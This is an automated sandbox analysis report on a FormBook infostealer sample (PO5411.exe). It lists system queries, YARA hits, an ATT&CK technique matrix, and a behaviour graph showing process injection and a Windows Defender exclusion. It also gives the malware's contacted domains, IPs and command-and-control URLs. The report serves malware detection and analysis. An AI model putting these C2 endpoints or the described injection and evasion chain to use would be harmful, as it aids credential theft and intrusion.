                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E7513 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,21_2_011E7513
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D443C GetVersion,21_2_011D443C
                      Source: C:\Users\user\Desktop\PO5411.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemoryQuery Registry1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection812Access Token Manipulation1Security Account ManagerSecurity Software Discovery341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion31LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection812Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information4Proc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing3/etc/passwd and /etc/shadowSystem Information Discovery125Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385218 Sample: PO5411.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 39 www.volmaqhsogroup.com 2->39 41 www.013y.com 2->41 43 2 other IPs or domains 2->43 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 7 other signatures 2->53 11 PO5411.exe 5 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Local\Temp\PO5411.exe, PE32 11->33 dropped 35 C:\Users\user\...\PO5411.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\...\PO5411.exe.log, ASCII 11->37 dropped 63 Writes to foreign memory regions 11->63 65 Allocates memory in foreign processes 11->65 67 Adds a directory exclusion to Windows Defender 11->67 69 Injects a PE file into a foreign processes 11->69 15 PO5411.exe 11->15         started        18 powershell.exe 26 11->18         started        signatures6 process7 signatures8 71 Multi AV Scanner detection for dropped file 15->71 73 Machine Learning detection for dropped file 15->73 75 Modifies the context of a thread in another process (thread injection) 15->75 77 4 other signatures 15->77 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 45 www.movementinspires.com 104.21.21.198, 49765, 80 CLOUDFLARENETUS United States 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 26 cmd.exe 20->26         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 26->57 59 Maps a DLL or memory area into another process 26->59 61 Tries to detect virtualization through RDTSC time measurements 26->61 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO5411.exe21%ReversingLabsByteCode-MSIL.Spyware.Solmyr
                      PO5411.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\PO5411.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\PO5411.exe21%ReversingLabsByteCode-MSIL.Spyware.Solmyr

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      17.2.PO5411.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      www.movementinspires.com0%VirustotalBrowse
                      volmaqhsogroup.com0%VirustotalBrowse
                      clientconfig.passport.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://james.new0%Avira URL Cloudsafe
                      http://www.movementinspires.com/pnqr/?rZULMf_=947cDAfMtsIS/zejVd4hkXb2b5N+AxK6ZTWGMEGb/CYmLctFgtEwYesMNqUKu8NWWTag&FtgT=MXyTezehH0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      https://wdcp.micros0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      www.013y.com/pnqr/100%Avira URL Cloudmalware
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://wdcp.micros?0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.013y.com
                      		104.164.33.210
                      		truetrue
                        		unknown
                        www.movementinspires.com
                        		104.21.21.198
                        		truetrueunknown
                        volmaqhsogroup.com
                        		107.180.0.224
                        		truetrueunknown
                        clientconfig.passport.net
                        		unknown
                        		unknowntrueunknown
                        www.volmaqhsogroup.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.movementinspires.com/pnqr/?rZULMf_=947cDAfMtsIS/zejVd4hkXb2b5N+AxK6ZTWGMEGb/CYmLctFgtEwYesMNqUKu8NWWTag&FtgT=MXyTezehHtrue
                          • Avira URL Cloud: safe
                          		unknown
                          www.013y.com/pnqr/true
                          • Avira URL Cloud: malware
                          		low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThePO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://james.newPO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.tiro.comexplorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
